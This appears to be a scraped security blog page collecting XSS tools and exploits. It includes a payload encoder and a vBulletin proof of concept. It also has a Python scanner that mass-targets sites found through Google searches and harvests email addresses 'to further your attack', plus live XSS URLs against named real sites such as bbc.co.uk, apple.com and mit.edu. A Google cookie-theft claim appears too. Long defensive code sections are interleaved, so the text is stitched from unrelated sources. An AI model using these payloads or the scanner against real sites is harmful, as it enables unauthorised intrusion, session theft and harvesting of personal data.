snuck automatic XSS filter bypass
snuck is an automated tool that can help in finding XSS vulnerabilities in web applications. It is based on Selenium and supports Mozilla Firefox, Google Chrome and Internet Explorer. The approach it adopts is based on inspecting the reflection context of the injection, and it relies on a set of specialized and obfuscated attack vectors for filter evasion. In addition, XSS testing is performed in-browser: a real web browser is driven to reproduce the attacker's behaviour and possibly the victim's.
Description
snuck is quite different from typical web security scanners: it tries to break a given XSS filter by specializing the injections in order to increase the success rate. The attack vectors are selected on the basis of the reflection context, that is, the exact point in the reflecting web page's DOM where the injection lands. Access to the pages' DOM is provided by Selenium WebDriver, an automation framework that replicates user operations in web browsers. Since many steps may be involved before an XSS filter is "activated", an XML configuration file has to be filled in to make snuck aware of the steps it needs to perform against the tested web application. Practically speaking, the approach is similar to iSTAR's, but it focuses on one particular XSS filter.
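The "reflection context" idea is worth seeing in code. The following is an added example, not part of snuck or of the original post: it reflects a constructed marker (`zq9rfl`, chosen here) followed by the four characters `"'<>` through a page, uses the standard-library HTML parser to classify where each copy lands (text node, attribute value, script block, comment), and then checks which of those characters came back raw. Whether an injection can break out depends on the context, so the verdict is per context: a raw `<` matters in a text node, a raw quote in an attribute, a raw `<` or quote inside a script. The sample response is constructed and the breakout table is this example's own assumption.

```python
import re
from html.parser import HTMLParser

MARKER = "zq9rfl"   # constructed probe token: alphanumeric, unlikely to occur naturally
PROBE = "\"'<>"     # the characters whose survival decides whether a context can be escaped
VOID_ELEMENTS = {"area", "base", "br", "col", "embed", "hr", "img", "input",
                 "link", "meta", "source", "track", "wbr"}
# Which raw probe characters let an injection leave each context (assumption of this example).
BREAKOUT_CHARS = {
    "text": "<",          # a raw < can open a new tag
    "attribute": "\"'",   # a raw quote can end the value; quote style is not recovered, so both count
    "script": "\"'<",     # quotes end a JS string literal; < allows a closing script tag
    "style": "\"'<",
    "comment": ">",       # a raw > (as in -->) can end the comment
}


class ReflectionContextParser(HTMLParser):
    """Records, in document order, the context in which MARKER is reflected."""

    def __init__(self, marker):
        super().__init__(convert_charrefs=False)  # keep entities literal so encoded copies stay visible
        self.marker = marker
        self.stack = []
        self.contexts = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value and self.marker in value:
                self.contexts.append("attribute:%s@%s" % (name, tag))
        if tag not in VOID_ELEMENTS:
            self.stack.append(tag)

    def handle_endtag(self, tag):
        if tag in self.stack:
            while self.stack.pop() != tag:
                pass

    def handle_data(self, data):
        if self.marker in data:
            parent = self.stack[-1] if self.stack else "document"
            self.contexts.append(parent if parent in ("script", "style") else "text@" + parent)

    def handle_comment(self, data):
        if self.marker in data:
            self.contexts.append("comment")


def surviving_probe_chars(tail, probe):
    """Walk the reflected copy of PROBE that follows the marker and return the characters
    that came back raw (entity-encoded or backslash-escaped copies do not count)."""
    raw, pos = set(), 0
    for expected in probe:
        if tail.startswith("\\", pos):        # backslash escape, as in a JS string
            pos += 2
        elif tail.startswith("&", pos):       # character reference such as &quot; or &#x27;
            end = tail.find(";", pos)
            if end == -1:
                break
            pos = end + 1
        elif tail.startswith(expected, pos):  # reflected unchanged
            raw.add(expected)
            pos += 1
        else:                                 # stripped, truncated or otherwise altered
            break
    return raw


def reflection_report(html, marker=MARKER, probe=PROBE):
    """Classify every reflection of marker+probe and say whether a breakout is possible there."""
    parser = ReflectionContextParser(marker)
    parser.feed(html)
    parser.close()
    positions = [m.end() for m in re.finditer(re.escape(marker), html)]
    report = []
    for context, pos in zip(parser.contexts, positions):  # both lists are in document order
        raw = surviving_probe_chars(html[pos:pos + 8 * len(probe)], probe)
        kind = re.split(r"[:@]", context)[0]
        report.append({
            "context": context,
            "raw": "".join(sorted(raw)),
            "breakout": bool(raw & set(BREAKOUT_CHARS[kind])),
        })
    return report


# Constructed response to a request that carried MARKER + PROBE in one parameter.
SAMPLE_RESPONSE = (
    "<html><body>"
    "<p>Results for zq9rfl&quot;&#x27;&lt;&gt;</p>"     # text node, fully entity-encoded
    "<input value=\"zq9rfl&quot;'&lt;&gt;\">"           # attribute value, single quote raw
    "<script>var q = \"zq9rfl\\\"'<>\";</script>"        # JS string, quotes escaped, < raw
    "<!-- last query: zq9rfl\"'<> -->"                  # HTML comment, > raw
    "</body></html>"
)

if __name__ == "__main__":
    for entry in reflection_report(SAMPLE_RESPONSE):
        print(entry)
```

Run against the sample, the text node is judged safe (everything encoded), the attribute is flagged because `'` survived (conservative, since the parser does not report which quote character delimited the value), the script block is flagged because `<` survived even though the quotes were backslash-escaped, and the comment is flagged for the raw `>`. A filter tester built this way picks its next step from the context rather than from a fixed payload list, which is the point snuck makes.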
Download here
IronWASP – Iron Web application Advanced Security testing Platform
IronWASP (Iron Web application Advanced Security testing Platform) is an open source system for web application vulnerability testing. It is designed to be customizable to the extent where users can create their own custom security scanners using it. Though an advanced user with Python/Ruby scripting expertise would be able to make full use of the platform, a lot of the tool’s features are simple enough to be used by absolute beginners.
Learn more about it here | Download from here
Passive Plug-ins
- Analyzes all traffic going through the tool
- Can also modify the traffic
- Identifies vulnerabilities passively
Eg: Passwords sent over clear text, HttpOnly/Secure flag missing in cookies
Active Plug-ins
- Performs scans against the target to identify vulnerabilities
- Executed only when the user explicitly calls them
- Fine-grained scanning support
Eg: Cross-site Scripting, SQL Injection
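The two passive checks named above (a password sent over clear text, a cookie set without HttpOnly or Secure) are simple enough to show end to end. This is an added example and not IronWASP code: it takes one HTTP exchange as a plain dictionary (the exchange below is constructed, not captured traffic), parses each `Set-Cookie` header by hand, and reports findings as `(check, detail)` tuples. The password-field regex and the dictionary layout are this example's own choices.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed exchange: a login POST over plain HTTP and the response that sets three cookies.
SAMPLE_EXCHANGE = {
    "method": "POST",
    "url": "http://shop.example/login",
    "request_headers": [("Content-Type", "application/x-www-form-urlencoded")],
    "body": "user=alice&password=hunter2&remember=1",
    "response_headers": [
        ("Set-Cookie", "session=3f9a1c; Path=/"),                 # neither flag
        ("Set-Cookie", "pref=dark; Path=/; Secure; HttpOnly"),    # both flags present
        ("Set-Cookie", "csrf=77ab; Path=/; HttpOnly"),            # Secure missing
    ],
}

# Field names that look like credentials (assumption of this example).
PASSWORD_FIELD = re.compile(r"pass(word|wd|phrase)?|pwd|secret", re.I)


def parse_set_cookie(header_value):
    """Return (cookie name, set of lower-cased attribute names) for one Set-Cookie header."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name = parts[0].split("=", 1)[0]
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
    return name, attrs


def check_cookie_flags(response_headers):
    """Flag every cookie set without HttpOnly or without Secure."""
    findings = []
    for header, value in response_headers:
        if header.lower() != "set-cookie":
            continue
        name, attrs = parse_set_cookie(value)
        if "httponly" not in attrs:
            findings.append(("cookie-httponly", name))
        if "secure" not in attrs:
            findings.append(("cookie-secure", name))
    return findings


def check_cleartext_credentials(method, url, body):
    """Flag credential-looking parameters in a request that is not protected by TLS."""
    parts = urlsplit(url)
    if parts.scheme != "http":
        return []
    params = parse_qs(body if method.upper() == "POST" else parts.query)
    return [("cleartext-password", key) for key in params if PASSWORD_FIELD.search(key)]


def passive_scan(exchange):
    """Run every passive check over one request/response pair; nothing is sent anywhere."""
    return (check_cleartext_credentials(exchange["method"], exchange["url"], exchange["body"])
            + check_cookie_flags(exchange["response_headers"]))


if __name__ == "__main__":
    for finding in passive_scan(SAMPLE_EXCHANGE):
        print("%-20s %s" % finding)
```

Being passive, the checks only read what already went through the proxy, so they can run on every exchange without adding requests to the target. A real plug-in would also skip cookies on HTTP-only test hosts and ignore the Secure finding for cookies that are deliberately set on plain HTTP; the example keeps the rules strict to stay short.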
IronWASP performs taint analysis for DOM-based XSS: it identifies sources and sinks and traces the data flow between them through the code. Custom source and sink objects can also be configured.
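Source-to-sink tracing can be illustrated with a deliberately small static tracer. This is an added example and not IronWASP's engine: it walks a JavaScript snippet one statement per line, marks a variable as tainted when its right-hand side mentions a DOM source (`location.hash`, `document.URL`, ...) or another tainted variable, clears the taint when a call from a small sanitizer list wraps the expression, and reports assignments to `innerHTML`/`outerHTML` and calls to `eval`/`document.write` that receive tainted data. The source, sink and sanitizer lists and the sample script are constructed for the example; the lists are configurable in the same spirit as the custom source and sink objects mentioned above.

```python
import re

SOURCES = ["location.hash", "location.search", "location.href", "document.URL",
           "document.referrer", "window.name"]
SINK_PROPERTIES = {"innerHTML", "outerHTML"}
SINK_CALLS = ["document.write", "document.writeln", "eval", "insertAdjacentHTML"]
# Calls treated as sanitizers for this demo: their result is considered clean.
SANITIZERS = ["encodeURIComponent", "parseInt", "Number"]

ASSIGN = re.compile(r"^(?:(?:var|let|const)\s+)?([^=]+?)\s*=(?!=)\s*(.+)$")
CALL = re.compile(r"^([\w$.]+)\s*\((.*)\)$")


def _mentions(expr, name, member_ok):
    """True if `name` occurs in `expr` as a whole identifier (or dotted path).
    member_ok=False refuses matches preceded by a dot, so a variable `hash`
    is not confused with the property `location.hash`."""
    before = r"(?<![\w$])" if member_ok else r"(?<![\w$.])"
    return re.search(before + re.escape(name) + r"(?![\w$])", expr) is not None


def _is_tainted(expr, tainted):
    if any(_mentions(expr, s, True) for s in SANITIZERS):
        return False
    return (any(_mentions(expr, s, True) for s in SOURCES)
            or any(_mentions(expr, v, False) for v in tainted))


def trace_dom_taint(js):
    """Line-by-line taint propagation. Assumes one statement per line and no '//' inside
    string literals. Returns (line number, sink, expression) for each tainted sink."""
    tainted, findings = set(), []
    for lineno, raw in enumerate(js.splitlines(), 1):
        stmt = raw.split("//", 1)[0].strip().rstrip(";")
        if not stmt:
            continue
        m = ASSIGN.match(stmt)
        if m:
            lhs, rhs = m.group(1).strip(), m.group(2).strip()
            if lhs.rsplit(".", 1)[-1] in SINK_PROPERTIES:
                if _is_tainted(rhs, tainted):
                    findings.append((lineno, lhs, rhs))
            elif _is_tainted(rhs, tainted):
                tainted.add(lhs)
            else:
                tainted.discard(lhs)  # overwritten with clean data
            continue
        m = CALL.match(stmt)
        if m:
            callee, args = m.group(1), m.group(2)
            is_sink = any(callee == s or callee.endswith("." + s) for s in SINK_CALLS)
            if is_sink and _is_tainted(args, tainted):
                findings.append((lineno, callee, args))
    return findings


# Constructed page script: two tainted sinks (lines 4 and 7), one sanitized sink (line 6).
SAMPLE_JS = """\
var hash = location.hash.substring(1);
var name = decodeURIComponent(hash);
var safe = encodeURIComponent(name);
document.getElementById("greet").innerHTML = "Hi " + name;
document.getElementById("out").textContent = name;
document.write(safe);
eval("go(" + hash + ")");
"""

if __name__ == "__main__":
    for lineno, sink, expr in trace_dom_taint(SAMPLE_JS):
        print("line %d: %s <- %s" % (lineno, sink, expr))
```

The tracer is intentionally crude: a sanitizer anywhere in an expression clears the whole expression, there is no control flow, and `textContent` is correctly not a sink. It does show the two things a real engine needs, a notion of which values derive from the URL and a list of places where such values become markup or code.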
Joomscan Security Scanner Updated
Joomscan Security Scanner was updated recently with a new database of 550 vulnerabilities. It detects file inclusion, SQL injection and command execution vulnerabilities in a target Joomla web site. The previous update for this tool was in August 2009, with 466 vulnerabilities.
In joomscan you can check for new updates with command:
./joomscan.pl check or ./joomscan.pl update.
Download for Windows (141 KB)
Download for Linux (150 KB)
Python XSS payload encoder
[cc lang="python"]#!/usr/bin/env python
'''
Python XSS payload encoder
Author: BGS (rstcenter.com)
Contributor cmiN (rstcenter.com)
Date: 13 August 2011
Version: Python 2.7
'''
import time
import sys
import urllib2
import base64


def main():
    # argv[1] selects the encoding, argv[2] is the payload to encode.
    try:
        if sys.argv[1] == "help":
            print '[-]' + time.ctime()
            print '''[-]Instructions:
encoder.py <encoding> <payload>
Available encodings: ascii b64 hex url
[-]Exiting...
'''
        elif sys.argv[1] == "b64":
            b64_encode()
        elif sys.argv[1] == "ascii":
            ascii_encode()
        elif sys.argv[1] == "hex":
            hex_encode()
        elif sys.argv[1] == "url":
            url_encode()
        else:
            sys.exit(1)
    except Exception:
        # A missing or malformed argument (IndexError included) ends up here.
        print 'Type "encoder.py help" for instructions! '
        sys.exit(1)


def b64_encode():
    payload = sys.argv[2]
    encoded = base64.standard_b64encode(payload)
    print ' ################## B64 String #######################'
    print ''
    print 'String:' + encoded
    print ''
    print "#################### >>EOF<< #########################"


def ascii_encode():
    # Emits a JavaScript String.fromCharCode(...) call with the code point of each character.
    payload = sys.argv[2]
    string = ''
    for w in payload:
        string += str(ord(w)) + ","
    print ' ################## ASCII String #####################'
    print ''
    print 'String.fromCharCode(' + string.strip(",") + ')'
    print ''
    print "#################### >>EOF<< #########################"


def hex_encode():
    payload = sys.argv[2]
    encoded = payload.encode('hex')
    print ' ################## HEX String #######################'
    print ''
    print 'String:' + encoded
    print ''
    print "#################### >>EOF<< #########################"


def url_encode():
    # Percent-encodes everything but unreserved characters (urllib2.quote is urllib.quote).
    payload = sys.argv[2]
    encoded = urllib2.quote(payload)
    print ' ################## URL String #######################'
    print ''
    print 'String:' + encoded
    print ''
    print "#################### >>EOF<< #########################"


if __name__ == '__main__':
    main()[/cc]
vBulletin Cross Site Scripting Vulnerability
Vulnerable versions: 4.1.3pl3, 4.1.4pl3 & 4.1.5pl1
PoC:
[cc lang="html"]http://www.example.com/forums/admincp/?";>[/cc]
Happy educational purpose testing!
facebook xss
Facebook.com XSS. You have to be logged out.
[cc lang="html"]http://www.facebook.com/r.php?fbpage_id=14077031341&r=111&next=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fscriptalertdocumentcookiescript%2F14077031341[/cc]
python xss scanner
[cc lang="python"]#!/usr/bin/python
#XSS Scanner that can find hosts using a google query or search one site.
#If XSS is found it attempts to collect email addresses to further your attack
#or warn the target of the flaw. When the scan is complete
#it will print out the XSS's found and or write to file, it will find false positives
#so manually check before getting to excited. It also has verbose mode and
#you can change the alert pop-up message, check options!!
#
##Changelog v1.1: added options, verbose, write to file, change alert
#Changelog v1.2: added more xss payloads, an exception, better syntax, more runtime feedback
#Changelog v1.3: added https support, more xss payloads, the ability to change port, fixed #some user input problems, exiting without error messages with Ctrl-C (KeyboardInterrupt)
#
#d3hydr8[at]gmail[dot]com
#
# Python 2 script. The indentation was lost in the posted copy and has been restored;
# the deprecated `sets` module is replaced by the built-in set().
import sys, urllib2, re, random, httplib, time, socket


def title():
    print "\n\t d3hydr8[at]gmail[dot]com XSS Scanner v1.3"
    print "\t-----------------------------------------------"


def usage():
    title()
    # The usage text was truncated in the posted copy; the argument forms below
    # are taken from the option handling at the bottom of this script.
    print "\n Usage: python XSSscan.py -g <google query> <hosts to collect> [options]"
    print "        python XSSscan.py -s <site> [port] [options]"
    print " Options: -v (verbose), -w <file> (write results), -a <text> (custom alert message)\n"


def StripTags(text):
    # Crude tag stripper: repeatedly removes the first <...> span until none are left.
    finished = 0
    while not finished:
        finished = 1
        start = text.find("<")
        if start >= 0:
            stop = text[start:].find(">")
            if stop >= 0:
                text = text[:start] + text[start+stop+1:]
                finished = 0
    return text


def timer():
    now = time.localtime(time.time())
    return time.asctime(now)


def fetch(target):
    # Build the URL from the configured scheme and port. The posted version passed
    # `port` as urlopen()'s data argument, which turned every request into a POST.
    host, sep, path = target.partition("/")
    return urllib2.urlopen(proto + "://" + host + ":" + port + "/" + path).read()


def geturls(query):
    counter = 10
    urls = []
    while counter < int(sys.argv[3]):
        url = 'http://www.google.com/search?hl=en&q='+query+'&hl=en&lr=&start='+repr(counter)+'&sa=N'
        # build_opener() takes handler objects, not a URL (the posted copy passed the URL).
        opener = urllib2.build_opener()
        opener.addheaders = [('User-agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)')]
        data = opener.open(url).read()
        hosts = re.findall(('\w+\.[\w\.\-/]*\.\w+'),StripTags(data))
        #Lets add sites found to a list if not already or a google site.
        #We don't want to upset the people that got our list for us.
        for x in hosts:
            if x.find('www') != -1:
                x = x[x.find('www'):]
            if x not in urls and re.search("google", x) == None:
                urls.append(x)
        counter += 10
    return urls


def getemails(site):
    try:
        if site.split("/",1)[0] not in done:
            print "\t[+] Collecting Emails:",site.split("/",1)[0]
            webpage = fetch(site.split("/",1)[0])
            emails = re.findall('[\w\.\-]+@[\w\.\-]+\.\w\w\w', webpage)
            done.append(site.split("/",1)[0])
            if emails:
                return emails
    except(KeyboardInterrupt):
        print "\n[-] Cancelled -",timer(),"\n"
        sys.exit(1)
    except(IndexError):
        pass


def getvar(site):
    # Collects ?param= strings, form actions and field names from the page,
    # then hands every combination with every payload to tester().
    names = []
    actions = []
    print "\n","-"*45
    print "[+] Searching:",site
    try:
        webpage = fetch(site)
        var = re.findall("\?[\w\.\-/]*\=",webpage)
        if len(var) >=1:
            var = list(set(var))
        found_action = re.findall("action=\"[\w\.\-/]*\"", webpage.lower())
        found_action = list(set(found_action))
        if len(found_action) >= 1:
            for a in found_action:
                a = a.split('"',2)[1]
                try:
                    if a[0] != "/":
                        a = "/"+a
                except(IndexError):
                    pass
                actions.append(a)
        found_names = re.findall("name=\"[\w\.\-/]*\"", webpage.lower())
        found_names = list(set(found_names))
        for n in found_names:
            names.append(n.split('"',2)[1])
        print "[+] Variables:",len(var),"| Actions:",len(actions),"| Fields:",len(names)
        # One term per loop below: variables, names, actions x names, actions x variables.
        print "[+] Avg Requests:",(len(var)+len(names)+(len(actions)*len(names))+(len(actions)*len(var)))*len(xss_payloads)
        if len(var) >= 1:
            for v in var:
                if site.count("/") >= 2:
                    for x in xrange(site.count("/")):
                        for xss in xss_payloads:
                            tester(site.rsplit('/',x+1)[0]+"/"+v+xss)
                for xss in xss_payloads:
                    tester(site+"/"+v+xss)
        if len(names) >= 1:
            for n in names:
                if site.count("/") >= 2:
                    for x in xrange(site.count("/")):
                        for xss in xss_payloads:
                            tester(site.rsplit('/',x+1)[0]+"/"+"?"+n+"="+xss)
                for xss in xss_payloads:
                    tester(site+"/"+"?"+n+"="+xss)
        if len(actions) != 0 and len(names) >= 1:
            for a in actions:
                for n in names:
                    if site.count("/") >= 2:
                        for x in xrange(site.count("/")):
                            for xss in xss_payloads:
                                tester(site.rsplit('/',x+1)[0]+a+"?"+n+"="+xss)
                    #tester(site.split("/")[0]+a+"?"+n+"="+xss)
        if len(actions) != 0 and len(var) >= 1:
            for a in actions:
                for v in var:
                    if site.count("/") >= 2:
                        for x in xrange(site.count("/")):
                            for xss in xss_payloads:
                                tester(site.rsplit('/',x+1)[0]+a+v+xss)
                    else:
                        for xss in xss_payloads:
                            tester(site.split("/")[0]+a+v+xss)
        if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google":
            urls.remove(site)
    except(socket.timeout, IOError, ValueError, socket.error, socket.gaierror, httplib.HTTPException):
        # Unreachable or misbehaving host: drop it from the queue so the -g loop can finish.
        if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google":
            urls.remove(site)
    except(KeyboardInterrupt):
        print "\n[-] Cancelled -",timer(),"\n"
        sys.exit(1)


def tester(target):
    if verbose ==1:
        if message != "":
            print "Target:",target.replace(alert ,message)
        else:
            print "Target:",target
    try:
        source = fetch(target)
        # Second request only to read the status line; use TLS when the site is https.
        if proto == "https":
            h = httplib.HTTPSConnection(target.split('/')[0], int(port))
        else:
            h = httplib.HTTPConnection(target.split('/')[0], int(port))
        try:
            h.request("GET", "/"+target.split('/',1)[1])
        except(IndexError):
            h.request("GET", "/")
        r1 = h.getresponse()
        if verbose ==1:
            print "\t[+] Response:",r1.status, r1.reason
        if re.search(alert.replace("%2D","-"), source) != None and r1.status not in range(303, 418):
            if target not in found_xss:
                if message != "":
                    print "\n[!] XSS:", target.replace(alert ,message)
                else:
                    print "\n[!] XSS:", target
                print "\t[+] Response:",r1.status, r1.reason
                emails = getemails(target)
                if emails:
                    print "\t[+] Email:",len(emails),"addresses\n"
                    found_xss.setdefault(target, list(set(emails)))
                else:
                    found_xss[target] = "None"
    except(socket.timeout, socket.gaierror, socket.error, IOError, ValueError, httplib.HTTPException):
        pass
    except(KeyboardInterrupt):
        print "\n[-] Cancelled -",timer(),"\n"
        sys.exit(1)


if len(sys.argv) <= 2:
    usage()
    sys.exit(1)
for arg in sys.argv[1:]:
    if arg.lower() == "-v" or arg.lower() == "-verbose":
        verbose = 1
    if arg.lower() == "-w" or arg.lower() == "-write":
        txt = sys.argv[int(sys.argv[1:].index(arg))+2]
    if arg.lower() == "-a" or arg.lower() == "-alert":
        message = re.sub("\s","%2D",sys.argv[int(sys.argv[1:].index(arg))+2])
title()
socket.setdefaulttimeout(3)
found_xss = {}
done = []
count = 0
proto = "http"
alert = "D3HYDR8%2D0wNz%2DY0U"
print "\n[+] XSS_scan Loaded"
try:
    if verbose ==1:
        print "[+] Verbose Mode On"
except(NameError):
    verbose = 0
    print "[-] Verbose Mode Off"
try:
    if message:
        print "[+] Alert:",message
except(NameError):
    print "[+] Alert:",alert
    message = ""
xss_payloads = ["%22%3E%3Cscript%3Ealert%28%27"+alert+"%27%29%3C%2Fscript%3E",
                "%22%3E",
                "%22%3E",
                "'';!--\"<%27"+alert+"%27>=&{()}",
                "';alert(0)//\';alert(1)//%22;alert(2)//\%22;alert(3)//--%3E%3C/SCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(%27"+alert+"%27)%3C/SCRIPT%3E=&{}%22);}alert(6);function",
                ""]
try:
    if txt:
        print "[+] File:",txt
except(NameError):
    txt = None
print "[+] XSS Payloads:",len(xss_payloads)
if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google":
    try:
        if sys.argv[3].isdigit() == False:
            print "\n[-] Argument [",sys.argv[3],"] must be a number.\n"
            sys.exit(1)
        else:
            if int(sys.argv[3]) <= 10:
                print "\n[-] Argument [",sys.argv[3],"] must be greater than 10.\n"
                sys.exit(1)
    except(IndexError):
        print "\n[-] Need number of hosts to collect.\n"
        sys.exit(1)
    query = re.sub("\s","+",sys.argv[2])
    port = "80"
    print "[+] Query:",query
    print "[+] Querying Google..."
    urls = geturls(query)
    print "[+] Collected:",len(urls),"hosts"
    print "[+] Started:",timer()
    print "\n[-] Cancel: Press Ctrl-C"
    time.sleep(3)
    while len(urls) > 0:
        print "-"*45
        print "\n[-] Length:",len(urls),"remain"
        getvar(random.choice(urls))
if sys.argv[1].lower() == "-s" or sys.argv[1].lower() == "-site":
    site = sys.argv[2]
    try:
        if sys.argv[3].isdigit() == False:
            port = "80"
        else:
            port = sys.argv[3]
    except(IndexError):
        port = "80"
    print "[+] Site:",site
    print "[+] Port:",port
    if site[:7] == "http://":
        site = site.replace("http://","")
    if site[:8] == "https://":
        proto = "https"
        if port == "80":
            print "[!] Using port 80 with https? (443)"
        site = site.replace("https://","")
    print "[+] Started:",timer()
    print "\n[-] Cancel: Press Ctrl-C"
    time.sleep(4)
    getvar(site)
print "-"*65
print "\n\n[+] Potential XSS found:",len(found_xss),"\n"
time.sleep(3)
if txt != None and len(found_xss) >=1:
    xss_file = open(txt, "a")
    xss_file.writelines("\n\td3hydr8[at]gmail[dot]com XSS Scanner v1.3\n")
    xss_file.writelines("\t------------------------------------------\n\n")
    print "[+] Writing Data:",txt
else:
    print "[-] No data written to disk"
for k in found_xss.keys():
    count+=1
    if txt != None:
        if message != "":
            xss_file.writelines("["+str(count)+"] "+k.replace(alert ,message)+"\n")
        else:
            xss_file.writelines("["+str(count)+"] "+k+"\n")
    if message != "":
        print "\n["+str(count)+"]",k.replace(alert ,message)
    else:
        print "\n["+str(count)+"]",k
    addrs = found_xss[k]
    if addrs != "None":
        print "\t[+] Email addresses:"
        for addr in addrs:
            if txt != None:
                xss_file.writelines("\tEmail: "+addr+"\n")
            print "\t -",addr
if txt != None and len(found_xss) >= 1:
    xss_file.close()
print "\n[-] Done -",timer(),"\n"[/cc]
xss in gamespy.com, bbc.co.uk, majorgeeks.com, cnn.com, apple.com, mit.edu, archive.org
List of working XSS:
gamespy.com
[cc lang="html"]http://planetcrysis.gamespy.com/screenshots/index.php?view=ss&ss=95--%3E%22%3E%3C/script%3E%3Cscript%3Ealert(3348399)%3C/script%3Epage=1&commentpage=98&&[/cc]
bbc.co.uk
[cc lang="html"]http://footballplayer.5live.external.bbc.co.uk/football-player/index.php?Feedback--%3E%22%3E%3C/script%3E%3Cscript%3Ealert%283348399%29%3C/script%3E& [/cc]
majorgeeks.com
[cc lang="html"]http://www.majorgeeks.com/downloadget.php?id=6257&file=1&evp=cfe61914b9aeeeb418fd0fc56c7477dd--%3E%22%3E%3C/script%3E%3Cscript%3Ealert(3348399)%3C/script%3E& [/cc]
cnn.com
[cc lang="html"]http://mexico.cnn.com/videos/2011/03/22/mexico-nuevo-presidente-en-el-prd--%3E%22%3E%3C/script%3E%3Cscript%3Ealert%283348399%29%3C/script%3E [/cc]
apple.com
[cc lang="html"]http://consultants.apple.com/au/reviews.php?location=001C000000nCBDK--%3E%22%3E%3C/script%3E%3Cscript%3Ealert%283348399%29%3C/script%3E& [/cc]
mit.edu
[cc lang="html"]http://prism.mit.edu/LabSched/roschedule.php?date=05-23-2011&scheduleid=sc143c7e920a4086--%3E%22%3E%3C/script%3E%3Cscript%3Ealert%283348399%29%3C/script%3E& [/cc]
archive.org
[cc lang="html"]http://www.archive.org/browse.php?field=subject--%3E%22%3E%3C/script%3E%3Cscript%3Ealert(3348399)%3C/script%3Emediatype=texts&collection=sauk_valley&& [/cc]
Credits 3348399 at rstcenter.com
I DO not encourage anyone to visit any of the links above and I will take no responsibility for any damage caused by this post.
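Every URL in the list above carries the same pattern once decoded: close a comment and a quoted string, end the script element, open a new one. That works only where a parameter is concatenated straight into a JavaScript string inside a `<script>` block. The following is an added example, not code from any of the sites or from the post's author: the vulnerable embedding beside the hardened one (JSON-encode the value, then escape `<`, `>` and `&` as `\u00XX` so nothing in the literal can end the script element), with a small parser check that counts how many script elements the browser would see. The payload string is constructed here as the decoded form of that pattern.

```python
import json
from html.parser import HTMLParser


def embed_unsafe(value):
    """Plain string concatenation into a JS literal: the pattern the URLs above exploit."""
    return '<script>var q = "%s";</script>' % value


def embed_safe(value):
    """JSON-encode the value, then escape the characters the HTML parser cares about so the
    literal can never terminate the script element. The result is still valid JSON/JS."""
    literal = json.dumps(value)  # escapes quotes, backslashes, control chars and non-ASCII
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
        literal = literal.replace(ch, esc)
    return "<script>var q = %s;</script>" % literal


class ScriptCounter(HTMLParser):
    """Counts <script> start tags the way an HTML parser would see them."""

    def __init__(self):
        super().__init__()
        self.scripts = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1


def count_script_elements(html):
    parser = ScriptCounter()
    parser.feed(html)
    parser.close()
    return parser.scripts


def embedded_literal(html):
    """Pull the JS literal back out of embed_safe()'s output and decode it,
    which shows the value survives the encoding intact."""
    return json.loads(html[len("<script>var q = "):-len(";</script>")])


# Constructed: the decoded form of the pattern used in the URLs above.
PAYLOAD = '";--></script><script>alert(1)</script>'

if __name__ == "__main__":
    print("unsafe :", embed_unsafe(PAYLOAD))
    print("         script elements:", count_script_elements(embed_unsafe(PAYLOAD)))
    print("safe   :", embed_safe(PAYLOAD))
    print("         script elements:", count_script_elements(embed_safe(PAYLOAD)))
```

The HTML parser ends a script element at the first `</script>` regardless of JavaScript quoting, which is why backslash-escaping quotes alone (as `addslashes`-style filters do) is not enough; the `\u003c` form is what Go's `html/template` and Django's `escapejs` emit for the same reason.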
working xss in google
The latest unpublished XSS, for which I got into the Hall of Fame, is still unpatched.
Here is the PoC I sent Google:
http://maps.google.com/?z=4&pw=2
And insert this inside the notes:
[cc lang="html"]
[/cc]
The PoC we sent to Google is located here.
It will give us your cookie, with which we can take over your Google account, including things like Gmail and YouTube, so beware!
For a simple PoC you probably just want to go to:
http://maps.google.com/?z=4&pw=2
And insert this in the notes:
[cc lang="html"]
[/cc]
Source here: http://h.ackack.net/unfixed-google-hack.html
XSSer Cross Site Scripter Download
Cross Site "Scripter" (aka XSSer) is an automatic -framework- to:
● Detect XSS flaws in web-based applications.
● Exploit -local/remote- code "in the wild".
● Report found vulnerabilities in real time to the community.
● XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping.
● XSS allows attackers to execute scripts in the victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
A penetration testing tool for detecting and exploiting XSS vulnerabilities.
Website | Group | Presentation | Download | Twitter
